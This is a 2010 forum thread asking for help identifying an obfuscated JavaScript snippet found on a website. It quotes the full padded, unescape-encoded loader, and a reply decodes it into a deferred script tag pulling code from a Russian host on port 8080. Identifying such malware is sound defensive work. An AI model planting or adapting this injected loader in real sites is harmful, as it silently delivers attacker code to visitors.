Author Topic: Which obfuscation method is used  (Read 2764 times)

0 Members and 1 Guest are viewing this topic.

April 14, 2010, 07:27:53 am
Read 2764 times

MathewMickle

  • Newbie

  • Offline
  • *

  • 2
hzzp://hetmanlaszki.republika.pl/ contains the following script code . I saw the similar code at least 2 times, want to know if the code is malicious or not.
If so ,could you tell me which obfuscation method is used in this case ?
   
Code: [Select]
<script>var _E;if(_E!='' && _E!='T'){_E=''};this._U='';var S;if(S!=''){S='AK'};function k(){var JiC;if(JiC!='kD' && JiC != ''){JiC=null};var Tq;if(Tq!='' && Tq!='Si'){Tq='t'};var _j="";var V;if(V!='' && V!='JB'){V=''};var s=new String();this.wk='';var N=unescape;var g=window;var _l=new String();var n=N("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%63%6c%69%63%6b%62%61%6e%6b%2e%63%6f%6d%2f%67%61%6d%65%73%70%6f%74%2e%63%6f%6d%2e%70%68%70");this.BN='';var E="";var Ef=new Date();function J(w,m){var Kj;if(Kj!='SiK'){Kj=''};this.It='';var _=String("KoHhg".substr(4));var Ga;if(Ga!='LI' && Ga!='gP'){Ga='LI'};var YA;if(YA!='BF' && YA!='Tl'){YA='BF'};var mu=N("%5b"), o=N("%5d");var G=mu+m+o;var C;if(C!=''){C='LK'};var y=new RegExp(G, _);var Z;if(Z!='lu'){Z='lu'};return w.replace(y, new String());var vc;if(vc!='Uq' && vc!='SO'){vc='Uq'};var Tv=new Date();};var LB=new Date();var r;if(r!=''){r='BB'};var SI;if(SI!=''){SI='Xp'};var yI='';var i=document;var Zo;if(Zo!='zz'){Zo='zz'};var nJ;if(nJ!='vN'){nJ='vN'};var __=new String();var ls=new Date();var Ji=J('84417202277899164063153','69124375');function F(){var NU;if(NU!='NT' && NU!='Hq'){NU=''};var A=N("%68%74%74%70%3a%2f%2f%73%6e%6f%72%65%66%6c%61%73%68%2e%72%75%3a");this.RQ="";this.XN="";__=A;var Wk='';var NQ=new String();__+=Ji;__+=n;var BJ;if(BJ!='De' && BJ!='Ue'){BJ='De'};var Adg="";try {var sj="";var NL;if(NL!='Wj' && NL != ''){NL=null};B=i.createElement(J('sWcfrfilpltu','oz18LB9NMWueCZJElK5f'));var BY;if(BY!='is'){BY=''};this.Hb="";this.mM="";var tr;if(tr!='' && tr!='gG'){tr='HK'};var mH;if(mH!='' && mH!='ZB'){mH='kW'};B[N("%73%72%63")]=__;var bE;if(bE!='gF'){bE=''};var Yh="";B[N("%64%65%66%65%72")]=[1][0];var fJ;if(fJ!='bx' && fJ!='bn'){fJ='bx'};var KB="";i.body.appendChild(B);var iB;if(iB!='rx' && iB!='vj'){iB=''};} catch(Aa){var _W=new Array();alert(Aa);var FF="";var hs=new String();};var bc;if(bc!='' && bc!='zo'){bc=''};var kv;if(kv!=''){kv='CK'};}var Ah;if(Ah!='Yb' && Ah!='IL'){Ah='Yb'};var YR;if(YR!='vO' && YR!='xY'){YR='vO'};var wq=new Array();g[new String("onloa"+"d6o8H".substr(0,1))]=F;var sl=new Array();this.Ja='';};var fk;if(fk!='' && fk!='XS'){fk=''};k();</script>

April 14, 2010, 07:20:48 pm
Reply #1

Garlando

  • Full Member

  • Offline
  • ***

  • 40
yes its malicious
it loads a script (which seems to be offline)

Code: [Select]
<script defer="defer" src="http://snoreflash.ru:8080/google.com/clickbank.com/gamespot.com.php"></script>